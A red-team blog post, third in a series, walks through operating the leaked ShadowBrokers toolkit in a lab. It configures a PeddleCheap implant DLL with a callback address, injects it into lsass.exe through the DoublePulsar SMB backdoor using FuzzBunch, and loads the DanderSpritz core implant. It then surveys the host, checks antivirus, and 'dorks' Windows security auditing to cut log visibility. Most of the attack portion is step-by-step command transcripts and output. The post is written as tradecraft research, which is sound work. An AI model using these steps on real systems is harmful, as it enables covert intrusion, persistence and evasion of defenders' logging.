/ ShadowBrokers

Match Made In The Shadows: Part [3]

Intro

At this point of the post, I assume you have set up a full environment from Part [2] post here and operational implant. Today we will be covering using FuzzBunch (FB) for exploitation, and launching a PeddleCheap implant on the target host.

In this series we are going to cover the following:

  1. Environment setup and configuration
  2. Walk through an exploit scenario and tutorial
  3. Cover tradecraft and the advanced nature of the DanderSpritz agent
  4. Additional deep dive into components

This post will only cover portion three (3) as the material and setup are dense.

DanderSpritz

This portion of the series we have sucessfully setup an FB instance and we are ready to start DS. Starting up DS is comfortable and pretty simple to troubleshoot if problems arise. Be prepared to add directories and such, as some components are missing.

DanerSpritz Setup

start.jar - starts the configuration setup
python start_lp.python - starts DS with auto setup

You should be greeted with a setup and environment init as shown below:

danderspritz_startu

Once you have a session created, you will have the ability to start to interact with specific modules within DP. The significant portion moving forward will be done within DP, as this is how we configure the Listening Post (LP).

PeddleCheap Configuration

PeddleCheap appears to be a "Heavy Weight" post-exploitation agent, with great capability. PeddleCheap is the "Stager" component of the toolkit; it can generate a multitude of stages, trigger, and bind payloads to load the core implant. It's hard to distinguish if the implant is truly PeddleCheap, but it should be noted ExpandingPulley and PeddleCheap share commonality and code name references within DP. I may cover EP in a different post as that agent is a bit older but has some interesting modules worth covering.

PeddleCheap Payload Prep

Before we can use DoublePulsar to launch a DLL via kernel -> User-mode injection using APCs we need to prep the LP and DLL. The command we will need is pc_prep.

NOTE:

  • My target is x86
  • Windows 7
  • DoublePulsar is already implanted
15:20:41>> pc_prep -tcp -i386 -sharedlib
[15:20:42] ID: 1927 'python' started [target: z0.0.0.1]
- Possible payloads:
-      0) - Quit
-      1) - Standard TCP (i386-winnt Level3 sharedlib)
-      2) - Standard TCP Generic (i386-winnt Level4 sharedlib)
-      3) - Standard TCP AppCompat-enabled (i386-winnt Level4 sharedlib)
-      4) - Standard TCP UtilityBurst-enabled (i386-winnt Level4 sharedlib)
-      5) - Standard TCP WinsockHelperApi-enabled (i386-winnt Level4 sharedlib)
Pick the payload type
  • pc_prep - Allows operator to prep a payload
  • -TCP - Command to only select, raw TCP as the C2
  • -i386 - x86 payloads only
  • -shared lib - Tell the framework we will only configure DLLs

The following is a transcript of the configuration I took to properly get a Level3 implant up (NOTE: I do have level4 implant working and will follow up):

Pick the payload type
1
Update advanced settings
YES
Perform IMMEDIATE CALLBACK?
YES
Update the Windows firewall when listening?
YES
Enter the PC ID [0]
0
Change the number of LISTEN LOOPS?
NO
Change the LISTEN DURATION per loop?
NO
Do you want to LISTEN?
YES
Change the LISTEN HOURS?
NO
Change LISTEN BIND ADDRESS
NO
Enter the callback address (127.0.0.1 = no callback) [127.0.0.1]
192.168.251.137
Change CALLBACK PORTS?
NO
Change exe name in version information?
NO
- Pick a key
-   0) Exit
-   1) Create a new key
-   2) Default
Enter the desired option
2
- Configuration:
- 
- <?xml version='1.0' encoding='UTF-8' ?>
- <PCConfig>
-   <Flags>
-     <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
-     <PCHEAP_CONFIG_FLAG_DONT_CREATE_WINDOW/>
-   </Flags>
-   <Id>0x0</Id>
-   <CallbackAddress>192.168.251.137</CallbackAddress>
- </PCConfig>
- 
Is this configuration valid
YES
Do you want to configure with FC?
NO
- Configured binary at:
-   D:\Logs\project_test\z0.0.0.1/Payloads/PeddleCheap_2017_11_11_15h23m59s.045/PC_Level3_dll.configured

PeddleCheap LP

Using DP we will now start the LP PRIOR to launch our payload as we setup Callback support:

lp_seupt

PeddleCheap Deployment

Using DoublePulsar, we will leverage he implanted host to run our DLL. Follow the configuration and edit sections as needed.

FB > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.155

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.155
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout:: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.251.155] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : D:\Logs\project_test\z0.0.0.1/Payloads/PeddleCheap_2017_11_11_15h23m59s.045/PC_Level3_dll.configured

[+] Set DllPayload => D:\Logs\project_test\z0.0.0.1/Payloads/PeddleCheap... (plus 50 characters)

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call

[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.155] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.155:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.251.155
TargetPort            445
DllPayload            D:\Logs\project_test\z0.0.0.1\Payloads\PeddleCheap
                      _2017_11_11_15h23m59s.045\PC_Level3_dll.configured
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] :

One interesting fact of using FB is that triple check of the data supplied indicating operators most likely followed a strict tool usage SOP to verify all commands and options. Makes sense as you are dealing with injecting into a critical process (NOTE: If you dork this up you will shut down the host or worse yet Bug Check). Once we are satisfied with the options we can execute, and let the fun begin:


[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0xEDA05F81
    SMB Connection string is: Windows 7 Enterprise 7600
    Target OS is: 7 x86
    Target SP is: 0
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

PeddleCheap Deploys Dsz Implant

In the Listener tab, you will revive an option to receive the callback from PC. Things begin to get interesting again, taking the first look we notice Yet Another DLL is sent to the PC implant. This design is an extremely modular approach and shows an interesting take on how each component is loaded reducing the risk of the toolset at every chance they obtain.

Connection received from [192.168.251.155]:8080 to [192.168.251.137]:80...
Connection accepted
Starting session...
PC LP Version: 2.3.0
LP...ready to send the MAGIC NUMBER
Sending additional 380 bytes of random
LP ...ready to receive the symmetric key
LP...ready to decrypt the key

Remote Information
    PC Version : 2.3.0
         PC Id : 0x0000000000000000
       Arch-Os : i386-winnt (compiled i386-winnt)
   Session Key : 0d 34 b9 eb d9 08 bc b4 90 cf e1 bb 13 f5 24 68

Getting remote OS information

Remote OS
             Arch : i386
    Compiled Arch : i386
         Platform : winnt
Compiled Platform : winnt
          Version : 6.1 (Windows 7)
     Service Pack : 0
    C Lib Version : 6.0.0

Sending OS version check status to remote side (4 bytes)
Data (OS version check status) has been sent
Data (OS version check status) has been received and stored by remote side

Ready to send implant
Successfully loaded LP DLLs

Payload 
      File Name : D:\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll
   Send payload : true
  Original Size : 248832
      Send Size : 137488
       Checksum : c745
           Name : 
           Path : 
         Export : #1


Sending PayloadInfo run type information
Sending File/Library info to remote side (36 bytes)
Data (File/Library info) has been sent
Data (File/Library info) has been received and stored by remote side

Sending Export name to remote side (3 bytes)
Data (Export name) has been sent
Data (Export name) has been received and stored by remote side

Sending Payload to remote side (137488 bytes)
Data (Payload) has been sent
Data (Payload) has been received and stored by remote side

The PC stager receives the final core implant at this time, successfully loading and acknowledging the receipt of the Dsz_Implant_Pc.dll DLL.

Current Process Manipulation

During the start routine, the operator is asked if the user wants to change the current process options. This deserves a bit of a deep dive as this is something malware often does to enable specific privileges, elevate or clean up the Process Environment Block (PEB) if operating out of memory.

Able to load audit plugin, NT_ELEVATION loaded correctly, moving on
- Current process options (0x4d)
-     DisableExceptionChainValidation
-     DisableThunkEmulation
-     execution disabled
-     Permanent
Do you want to modify the process options?
YES

At the moment the current settings are enabled:

  • DisableExceptionChainValidation
    • Structured Exception Handler Overwrite Protection (SEHOP)
    • Disabled by DEFAULT on Windows 7
    • This is required by PC to prevent process termination in the case of interacting with specific memory. This is interesting find as it may cloud to certain types of plugins being loaded
  • DisableThunkEmulation
    • Changes data execution prevention (DEP) and DEP-ATL thunk emulation settings for a 32-bit process.
    • Its supposed to be an option that cannot disabled for the life of the process
  • ExecutionDisabled
    • Needs some more research as it may be referring to an executable memory regions?
  • Permanent
    • Windows Vista sets a bit that keeps PC from fixing the process options
    • If this flag is set, PC will elevate to change other process flags

We are going to jump ahead for a second and analyze a built-in command that allows the operator to check these settings once the agent is fully loaded; process options -query. We can see from the output the agent was successful in setting the execution flags in the process:

[17:16:20] ID: 2271 'process options' started [target: z0.0.0.17]
Execute options are 0x00000072

      EXECUTION_ENABLED

      EXECUTE_DISPATCH_ENABLED

      IMAGE_DISPATCH_ENABLED

      DISABLE_EXCEPTION_CHAIN_VALIDATION

Query/Set successful

I did do some more research on this:

PeddleCheap Registration

Once the initial process checks pass, the agent begins a light survey of the operating system to build an implant survey config that will be stored LP side. This allows an operator to catch callbacks from multiple agents and reactivate that agents settings or monitors that are currently active.

Running command 'python Connected/Connected.py -project Ops.'
Unable to get target DB for unknown target
- --------------------------------------------------
- Re-registering global wrappers for current target
- --------------------------------------------------
- hide - Windows kernel 6.0+ PatchGuard protection
- packetredirect - Trigger failure alerter
- --------------------------------------------------
Showing you what we know so you can make a good decision in the menu below
crypto_guid: 20aa4209-ea71-422d-b4db-ea848e9a8c0d
hostname: OP-PC
macs: [u'00-50-56-ea-71-f2', u'00-0c-29-79-db-6e']
implant_id: 0x0000000000000000

Below match threshold or multiple matches. You must choose. Choose wisely.

  0) None of these - create a new target db

  1) (Confidence: 0.333333333333) project_test / OP-PC / PC ID 0x0000000000000000 / 7974af2e-6f94-4c19-9a3b-980b5dc54bd7 / MACS: ['00-50-56-f2-d3-78', '00-0c-29-2d-38-ef']

After some further analysis, you will notice the use of a GUID; this is a standard way of finger-printing a host and allowing an operator to create payloads that cryptographically bind to one host.

PeddleCheap System Survey

A major reason we started this series of posts was to get to this exact point, its a compelling portion of what we do on offensive operations. This implant does it in such a way that I want emulate a good portion of these on implants we use.

Network Adapters / Data

Offensive operations often require a deep understanding of the host you just landed on, to the trained eye this data is invaluable. You will find while trying to traverse specific subnets and networks that in some cases dual-homed machines are the only way without other attack vectors being present.

- [2017-11-09 19:28:22 z0.0.0.13] Showing ifconfig data so you can make sure you are on the correct target
FQDN: OP-PC
DNS Servers: 192.168.251.2
|               Description                |        MAC        |       IP        |    Netmask    |    Gateway    |   DHCP Server   |                                 Name                                  |
+------------------------------------------+-------------------+-----------------+---------------+---------------+-----------------+-----------------------------------------------------------------------+
| Bluetooth Device (Personal Area Network) | 00-50-56-EA-71-F2 | 169.254.96.23   |               |               |                 | Bluetooth Network Connection ({2C0A9CD7-B4BE-46F2-A86F-CC3639874531}) |
| Intel(R) PRO/1000 MT Network Connection  | 00-0C-29-79-DB-6E | 192.168.251.155 | 255.255.255.0 | 192.168.251.2 | 192.168.251.254 | Local Area Connection ({7B157EBD-BD87-47F3-A79A-6167FE6A3270})        |
System Version

One thing to note is the specific information that it's pulling back. Specifically targeting platform data and product types. This information is often taken into account when deciding the proper host to implant and maintains access. I have worked on this on type of data collection in the past: Persistence

Running command 'survey -run D:\Resources\Ops\Data\survey.xml -sections env-setup -quiet'
Running command 'system version. '
Architecture: i386
   OS Family: winnt
     Version : 6.1 (Build 7600)
    Platform : Windows 7
Service Pack : 0.0
  Extra Info : 
Product Type : Workstation / Professional
    Terminal Services is installed, but only one interactive session is supported.

    Command completed successfully
System Processes

While a normal function of many agents is processed listings, DP took this to the next level allowing operators to easily identify the potential malicious as well as standard system process. I also love the formatted output denoting parent/child.

- [2017-11-09 19:28:28 z0.0.0.13] ================================== Process list ==================================================================
- [2017-11-09 19:28:30 z0.0.0.13] Data age: 01 seconds - data is fresh
- | PID  | PPID |                                 Full Path                                  |             User             |                          Comment                           |
- +------+------+----------------------------------------------------------------------------+------------------------------+------------------------------------------------------------+
- |    0 |    0 |                                                                            |                              |                                                            |
- |    4 |    0 | System                                                                     |                              | System Kernel                                              |
- |  272 |    4 | ---\SystemRoot\System32\smss.exe                                           | NT AUTHORITY\SYSTEM          | Session Manager Subsystem                                  |
- |  364 |  352 | C:\Windows\system32\csrss.exe                                              | NT AUTHORITY\SYSTEM          | Client-Server Runtime Server Subsystem                     |
- |  416 |  352 | C:\Windows\system32\wininit.exe                                            | NT AUTHORITY\SYSTEM          | Vista background service launcher                          |
- |  516 |  416 | ---C:\Windows\system32\services.exe                                        | NT AUTHORITY\SYSTEM          | Windows Service Controller                                 |
- |  640 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- | 2024 |  640 | ---------C:\Windows\system32\wbem\wmiprvse.exe                             | NT AUTHORITY\NETWORK SERVICE | Microsoft Windows Management Instrumentation               |
- |  696 |  516 | ------C:\Program Files\VMware\VMware Tools\vmacthlp.exe                    | NT AUTHORITY\SYSTEM          | VMWare                                                     |
- |  728 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- |  780 |  516 | ------C:\Windows\System32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- |  908 |  516 | ------C:\Windows\System32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- | 2724 |  908 | ---------C:\Windows\system32\Dwm.exe                                       | OP-PC\OP                     | Vista Desktop Window Manager                               |
- |  932 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- | 1088 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1244 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1356 |  516 | ------C:\Windows\System32\spoolsv.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Printer Spooler Service                          |
- | 1392 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1508 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1596 |  516 | ------C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe | NT AUTHORITY\SYSTEM          |                                                            |
- | 1620 |  516 | ------C:\Program Files\VMware\VMware Tools\vmtoolsd.exe                    | NT AUTHORITY\SYSTEM          | VMware Tools                                               |
- | 1872 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\LOCAL SERVICE   | Microsoft Service Host Process (Check path in processdeep) |
- | 1936 |  516 | ------C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe               | NT AUTHORITY\SYSTEM          |                                                            |
- | 2972 | 1936 | ---------C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe            | OP-PC\OP                     |                                                            |
- | 1980 |  516 | ------C:\Windows\system32\svchost.exe                                      | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1152 |  516 | ------C:\Windows\System32\msdtc.exe                                        | NT AUTHORITY\NETWORK SERVICE | Distributed Transaction Coordinator                        |
- | 2656 |  516 | ------C:\Windows\system32\taskhost.exe                                     | OP-PC\OP                     | Windows 7 Generic Host Process                             |
- | 3088 |  516 | ------C:\Windows\system32\SearchIndexer.exe                                | NT AUTHORITY\SYSTEM          | Microsoft search indexer                                   |
- | 3248 |  516 | ------C:\Program Files\Windows Media Player\wmpnetwk.exe                   | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service               |
- | 3648 |  516 | ------C:\Windows\system32\sppsvc.exe                                       | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service             |
- | 3684 |  516 | ------C:\Windows\System32\svchost.exe                                      | NT AUTHORITY\SYSTEM          | Microsoft Service Host Process (Check path in processdeep) |
- |  524 |  416 | ---C:\Windows\system32\lsass.exe                                           | NT AUTHORITY\SYSTEM          | Local Security Authority Server Subsystem                  |
- |  532 |  416 | ---C:\Windows\system32\lsm.exe                                             | NT AUTHORITY\SYSTEM          | Vista Local Session Manager                                |
- |  424 |  408 | C:\Windows\system32\csrss.exe                                              | NT AUTHORITY\SYSTEM          | Client-Server Runtime Server Subsystem                     |
- | 2980 |  424 | ---C:\Windows\system32\conhost.exe                                         | OP-PC\OP                     | Microsoft Console Windows Host                             |
- |  472 |  408 | C:\Windows\system32\winlogon.exe                                           | NT AUTHORITY\SYSTEM          | Microsoft Windows Logon Process                            |
- | 2760 | 2712 | C:\Windows\Explorer.EXE                                                    | OP-PC\OP                     | Windows Explorer Shell                                     |
- | 2892 | 2760 | ---C:\Program Files\VMware\VMware Tools\vmtoolsd.exe                       | OP-PC\OP                     | VMware Tools                                               |
- | 3948 | 2760 | ---C:\Users\OP\Desktop\PC_Level4_exe.exe                                   | OP-PC\OP                     |                                                            |
- | 4064 | 2760 | ---C:\Users\OP\Desktop\PC_Level4_exe (2).exe                               | OP-PC\OP                     |                                                            |
background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor  \" " 
System Uptime

Yet another classic piece of data, cant say how many times I have checked this to know a users routine.

- [2017-11-09 19:28:31 z0.0.0.13] ===================================== Uptime =====================================================================
Uptime: 1 days, 8:32:13
System Auditing

This is somthing that I feel we could do better on Red Teams and ensuring that we are fully in the know of a host machine when we implant. Some thing I will be pushing on my guys to do more as we grow!

- [2017-11-09 19:28:31 z0.0.0.13] ================== Auditing status check, dorking will be later ==================================================
- [2017-11-09 19:28:32 z0.0.0.13] Data age: 00 seconds - data is fresh
- [2017-11-09 19:28:32 z0.0.0.13] Auditing is enabled on this machine
|             Category              | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange        | True    | False   |
| System_Integrity                  | True    | True    |
| System_Others                     | True    | True    |
| Logon_Logon                       | True    | False   |
| Logon_Logoff                      | True    | False   |
| Logon_AccountLockout              | True    | False   |
| Logon_SpecialLogon                | True    | False   |
| Logon_NPS                         | True    | True    |
| PolicyChange_AuditPolicy          | True    | False   |
| PolicyChange_AuthenticationPolicy | True    | False   |
| AccountManagement_UserAccount     | True    | False   |
| AccountManagement_SecurityGroup   | True    | False   |
- [2017-11-09 19:28:32 z0.0.0.13] The above is only being shown for informational purposes, you will be prompted about dorking later
System Drivers

I take system enumeration pretty serious and some the best operators I have worked with do to. One thing I dont see enough is the enumeration and monitoring of system drivers. They are core component of must AV, cant easily be hidden and must be signed in modern Operating Systems (x64+). A intresting poll I took seems to represent this:

One thing of interest here is the exhaustive list of drivers they have compiled based on hashing and name conventions. Even alerting to known malware and such: Driver List, as well as the known list of Driver Personel Security Products PSP's.

These driver lists may help you implement these checks for you as expect some .CNA scripts coming soon for CobaltStrike :)

- [2017-11-09 19:28:32 z0.0.0.13] =================================== Driver list ===================================================================
Running command 'python D:\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"'
- |      Driver       |            Path             |      Flags       |             Comment              |  Type   | First Seen | Also On |
- +-------------------+-----------------------------+------------------+----------------------------------+---------+------------+---------+
- | dump_diskdump.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH   | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-11-08 |         |
- | dump_dumpfve.sys  | C:\Windows\system32\drivers | RANDOM,NO_HASH   | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-11-08 |         |
- | dump_lsi_sas.sys  | C:\Windows\system32\drivers | RANDOM,NO_HASH   | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-11-08 |         |
- | vmmemctl.sys      | C:\Windows\system32\drivers | NAME_MATCH,NEW   | VMware Server Memory Controller  | NORMAL  | 2017-11-08 |         |
- | vmrawdsk.sys      | C:\Windows\system32\drivers | NAME_MATCH,NEW   | VMWare Raw Disk Helper Driver    | NORMAL  | 2017-11-08 |         |
- | vmusbmouse.sys    | C:\Windows\system32\drivers | NEW,UNIDENTIFIED |                                  |         | 2017-11-08 |         |
- | vsock.sys         | C:\Windows\system32\drivers | NEW,UNIDENTIFIED |                                  |         | 2017-11-08 |         |
System Installed Packages / System Software Keys

While not supper intresting its just my sistualtational awarness that the agent is implemting on intail access.

- [2017-11-09 19:28:43 z0.0.0.13] =============================== Installed software ===============================================================

- --------------------------------------------------------------- Installer Packages ---------------------------------------------------------------
- [2017-11-09 19:28:45 z0.0.0.13] Data age: 01 seconds - data is fresh
| Architecture |                              Name                              |      Description      | Installed version | Date installed |
+-------------+----------------------------------------------------------------+-----------------------+-------------------+----------------+
| 32-bit      | Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 | Microsoft Corporation | 9.0.30729.6161    | 2017-11-09     |
| 32-bit      | VMware Tools                                                   | VMware, Inc.          | 10.1.15.6627299   | 2017-11-09     |
- ----------------------------------------------------------------- Software key(s) -----------------------------------------------------------------
- [2017-11-09 19:28:47 z0.0.0.13] Data age: 01 seconds - data is fresh
| Architecture |          Name          | Last update |
+--------------+------------------------+-------------+
| 32-bit       | ATI Technologies       | 2009-07-14  |
| 32-bit       | Classes                | 2017-11-10  |

- -------------------------------------------------------------- Program files dir(s) --------------------------------------------------------------
- [2017-11-09 19:28:50 z0.0.0.13] Data age: 01 seconds - data is fresh
| Architecture |       Folder Name        |           Modified            |
+--------------+--------------------------+-------------------------------+
| 32-bit       | Common Files             | 2017-11-10T05:35:26.343307800 |
| 32-bit       | DVD Maker                | 2009-07-14T07:20:43.834375000 |
| 32-bit       | Internet Explorer        | 2009-07-14T04:56:49.415378700 |
| 32-bit       | MSBuild                  | 2009-07-14T04:52:30.938524700 |
<----SNIP----->
Serivce Checks

Serive enumeration can be a bit dirty using the built in command line tools. I like the cleanoutput as awell as the full name and discription of each service of this module. Not much else of intrest here..

- [2017-11-09 19:28:50 z0.0.0.13] ================================ Running services ================================================================
- [2017-11-09 19:28:52 z0.0.0.13] Data age: 01 seconds - data is fresh
|                 Display name                 |            Service name             |
+----------------------------------------------+-------------------------------------+
| Application Information                      | Appinfo                             |
| Windows Audio Endpoint Builder               | AudioEndpointBuilder                |
| Windows Audio                                | Audiosrv                            |
| Base Filtering Engine                        | BFE                                 |
| Background Intelligent Transfer Service      | BITS                                |
<----SNIP----->
PSP Checks

So I have heard this time and time over again:

I don't care about AV

Which for the longest time it may be right. But, now imagine your mission is to use a million dollar toolset and operate on targets of national interest (If that's what this tool was used for). If you can leave behind a trace of past targets, that's the type of things that have massive political effects as well as capability loss. Many APT groups focus on collection operation from the intelligence I have seen and researched. While access may be leveraged for physical effects (rarely the case but did happen during Russo-Georgian War) it's often rare we know this type of action took place or even occurs. As you can imagine no country wants to expose, their critical infrastructure may have been compromised. Now you combine that with intel gathered from sizeable Cyber intelligence firms such as Kaspersky, Symantec, etc., If they can trace back past samples that may have been analyzed by their engines, you may place the toolkit and access at risk. A great example would be Stuxnet and their ability to track down versioning of the agent with automatic cloud submission and telemetry data.

We will be covering this module in depth in Post 4 as well:

- [2017-11-09 19:28:52 z0.0.0.13] =================================== AV Check!!! ===================================================================
Running command 'python windows\checkpsp.py -project Ops '
- Checking for any running known PSP's...
-   microsoft
- 

- Checking for target PSP history...

- Found configuration history for Microsoft.

- Saw PSP's we can act on. Running scripts.
- ============================================
- =                microsoft                 =
- ============================================
- Checking for a change in configuration

- The following PSPs had NO changes:
-   Microsoft Windows Defender Windows 7 Enterprise
- +--------------------+----------------------+
- |                    |    Setting Value     |
- +--------------------+----------------------+
- | vendor             |            Microsoft |
- | product            |     Windows Defender |
- | version            | Windows 7 Enterprise |
- | Definition Updates |                 None |
- | Information        |                 None |
- | Install Date       |                 None |
- | Log File           |                 None |
- | Quarantine         |                 None |
- | ServiceStart       |                    2 |
- | Software           |                  PSP |
- | SpyNet             |                    0 |
- | Status             |              Enabled |
- +--------------------+----------------------+
Audit Dorking

Another topic I plan on deep diving and pulling out data on is the ability to dork audingt potentially reducing the visability automted log collection assets may have insight into. A intresitng module endeed.

- [2017-11-09 19:29:00 z0.0.0.13] ================================ Auditing dorking ================================================================
- [2017-11-09 19:29:00 z0.0.0.13] Data age: 28 seconds (from local cache, re-run manually if you need to)
- [2017-11-09 19:29:00 z0.0.0.13] Auditing is enabled on this machine
|             Category              | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange        | True    | False   |
| System_Integrity                  | True    | True    |
| System_Others                     | True    | True    |
| Logon_Logon                       | True    | False   |
| Logon_Logoff                      | True    | False   |
| Logon_AccountLockout              | True    | False   |
| Logon_SpecialLogon                | True    | False   |
| Logon_NPS                         | True    | True    |
| PolicyChange_AuditPolicy          | True    | False   |
| PolicyChange_AuthenticationPolicy | True    | False   |
| AccountManagement_UserAccount     | True    | False   |
| AccountManagement_SecurityGroup   | True    | False   |
Do you want to dork security auditing?
YES
- [2017-11-09 19:29:05 z0.0.0.13] Security auditing work, do not stop command 291 or you will lose your blessing
System Monitors

It's funny because I spoke on this type of thing in depth with using Event tracing and WMI to log user and potentially defense actions taking place on a host. Slides to that talk can be found here. Interesting enough we will see in the next post they used the front end to update this info continuously. Red Teams should be implementing these types of CI, allowing an operator to take necessary steps in a contingency event. This type of monitoring is often used heavily with C2 infrastructure as its often the first sign your campaign may have been burnt.

 [2017-11-09 19:29:05 z0.0.0.13] Security auditing dorked, do not stop command 291 or you will lose your blessing

- [2017-11-09 19:29:05 z0.0.0.13] ==================================== Monitors ====================================================================
     Monitors
     -----------------------------
 1)  Full - arp, netstat, activity
 2)  Netstat and activity
 3)  Activity only

 4)  Done

Select your monitors (full recommended for most situations): [1] 
Staring a monitor with activity -monitor 

Final Thoughts

We just really touched on the capability of this agent! I'm sorry it's taking a bit to get this analysis out as post four will be pretty intense and contains a good bit of research.

beer-mug_1f37a-1

NOTE: Not A IPA*

Alexander Rymdeko-Harvey

Alexander Rymdeko-Harvey

Alexander Rymdeko-Harvey is an experienced Red Teamer. He loves to develop on offensive TTPs and has a knack for Windows internals. He prides himself on being a husband, father and prior Army.

Read More